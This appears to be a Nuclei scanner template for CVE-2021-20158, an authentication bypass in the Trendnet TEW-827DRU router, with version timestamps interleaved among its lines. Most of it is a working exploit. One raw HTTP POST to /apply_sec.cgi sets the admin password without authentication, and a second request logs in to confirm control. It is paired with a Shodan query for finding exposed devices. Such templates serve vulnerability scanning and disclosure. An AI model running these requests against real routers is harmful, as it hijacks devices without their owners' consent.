2022-02-04 16:29:16 +00:00
id : CVE-2021-20158
info :
2022-05-09 16:12:52 +00:00
name : Trendnet AC2600 TEW-827DRU 2.08B01 - Admin Password Change
2022-02-04 16:29:16 +00:00
author : gy741
severity : critical
2022-05-09 16:12:52 +00:00
description : Trendnet AC2600 TEW-827DRU version 2.08B01 contains an authentication bypass vulnerability. It is possible for an unauthenticated, malicious actor to force change the admin password due to a hidden administrative command.
2022-02-04 16:29:16 +00:00
reference :
- https://www.tenable.com/security/research/tra-2021-54
- https://nvd.nist.gov/vuln/detail/CVE-2021-20150
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2022-02-04 16:29:16 +00:00
cve-id : CVE-2021-20158
cwe-id : CWE-287
2023-04-12 10:55:48 +00:00
epss-score : 0.00806
2022-02-04 16:29:16 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 2
2022-02-04 16:29:16 +00:00
shodan-query : http.html:"TEW-827DRU"
2022-08-27 04:41:18 +00:00
tags : disclosure,router,intrusive,tenable,cve,cve2021,trendnet
2022-02-04 16:29:16 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-02-04 16:29:16 +00:00
- raw :
- |
POST /apply_sec.cgi HTTP/1.1
Host : {{Hostname}}
ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password=nuclei
2022-02-04 18:01:10 +00:00
- |
2022-02-04 16:29:16 +00:00
POST /apply_sec.cgi HTTP/1.1
Host : {{Hostname}}
html_response_page=%2Flogin_pic.asp&login_name=YWRtaW4%3D&log_pass=bnVjbGVp&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=
matchers-condition : and
matchers :
- type : status
status :
- 200
- type : word
part : body
words :
- 'setConnectDevice'
- 'setInternet'
- 'setWlanSSID'
- 'TEW-827DRU'
condition : and
- type : word
part : header
words :
- "text/html"
2022-02-25 22:07:55 +00:00
2022-05-09 16:12:52 +00:00
# Enhanced by mp on 2022/05/05